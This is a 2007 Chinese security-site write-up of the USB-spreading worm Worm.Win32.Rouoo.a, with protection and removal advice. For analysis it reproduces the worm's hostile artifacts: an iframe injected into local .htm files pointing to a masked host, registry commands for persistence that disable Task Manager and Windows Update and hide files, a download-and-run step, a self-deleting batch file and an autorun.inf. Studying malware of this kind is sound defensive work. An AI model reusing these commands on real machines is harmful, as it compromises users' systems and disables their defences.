| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 安全365社区 |
安全365
收藏本站
设为首页
会员登录:
站内搜索: 新闻中心 系统安全 网络安全 安全技术 下载中心
| 安全技术首页 | 技术研究 | 技术应用 | 数据安全 | 企业专区 |
“鲁欧蠕虫”病毒技术细节
“鲁欧蠕虫”病毒技术细节
作者:未知 文章来源:网络 点击数: 更新时间:2007-12-1 1:45:43
危险等级:★★★
病毒名称:Worm.Win32.Rouoo.a
截获时间:2007-11-27
入库版本:20.20.11
类型:病毒

感染的操作系统:Windows XP, Windows NT, Windows Server 2003, Windows 2000
威胁情况:

传播级别:高

全球化传播态势:低

清除难度:困难

破坏力:低

破坏手段:通过移动储存设备进行传播
 
危险等级:★★★
病毒名称:Worm.Win32.Rouoo.a
截获时间:2007-11-27
入库版本:20.20.11
类型:病毒

感染的操作系统:Windows XP, Windows NT, Windows Server 2003, Windows 2000

  这是一个Delphi编写的蠕虫病毒,使用UPX进行加壳保护

    病毒运行后,使用GetSystemDirectory获得系统%SYSTEM32%目录,并将自身复制过去.

    病毒使用CreateMutexA创建一个"SOS"的互斥,保证当前只有一个实例在运行.

    病毒会在当前目前中创建一个和病毒名相同的bat文件并运行,其中BAT文件的内容为:
:try
del %FILENAME%
if exist %FILENAME% goto try
del %0

    病毒会遍历本地所有磁盘,在后缀为htm的文件的最后一行添加如下代码:
<iframe src="http://www.XXXX.cn/all/index.htm?a" width="50" height="0"></iframe>

    病毒会使用ShellExecuteA和Winexec运行下列代码,修改注册表:
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v  
DisableWindowsUpdateAccess /t REG_dword/d 00000001 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System  
/v DisableTaskMgr /t REG_dword /d  
00000001 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced"  
/v Hidden /t reg_dWord /d 00000000 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"  
/v HideFileExt /t reg_dword /d 00000001 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"  
/v ShowSuperHidden /t reg_dword /d  
00000000 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"  
/v ShowSuperHidden /t reg_dword /d  
00000000 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\SHOWALL" /v CheckedValue /t  
REG_SZ /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\NOHIDDEN" /v CheckedValue /t  
REG_dword /d 00000002 /f

    病毒会使用UrlDownloadFile从网http://www.XXXX.cn/xzz/xxxxx下载这个文件并保存在C:\WINNT\System32\FSEc.COM的位置上

    如果下载失败,则继续从网http://www.XXXX.cn/xzz/xxxxx下载另一个文件保存在C:\WINNT\SYSTEM32\Stvch.exe的位置上,并运行

    病毒会使用SetSystemTime将系统时间改为2000年,这么做的目的很明显是为了使AVP杀毒软件失效.

    最后病毒,使用SetTimer函数,在回调中,向本地所有磁盘写入autorun.inf和病毒本身,其中autorun.inf的内容为:
[AuToRuN]
open=soS.Exe
shell\open=打开(&O)
shell\open\Command=soS.Exe
shell\open\Default=1

安全建议:

    1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。

    2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞

    3 不浏览不良网站,不随意下载安装可疑插件。

    4 不接收QQ、MSN、Emial等传来的可疑文件。

    5 上网时打开杀毒软件实时监控功能。

    6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。

清除办法:

    瑞星杀毒软件清除办法:

    安装瑞星杀毒软件,升级到20.20.11版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀
文章录入:郝丽    责任编辑:郝丽 
  • 上一篇文章:

  • 下一篇文章: 没有了
    		•
    【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    病毒感染记事本文件 从
    病毒针对杀毒软件特性对
    “愤怒天使”病毒给受感
    木马利用HOOK和内存截取
    Taskmgr.exe(QQ“缘”病
    木马病毒查找与清除实战
    隐私者木马病毒在桌面创
    病毒再次作怪 使电脑系
    病毒 AntiAV 使用诡计骗
    MSN防范手记 手动清除ch
    站长邮箱:webmaster@anquan365.com
    联系电话:86-10-67634029 点击这里给我发消息

    Copyright © 2006-2008 www.anquan365.com 北京华安普特网络科技有限公司 版权所有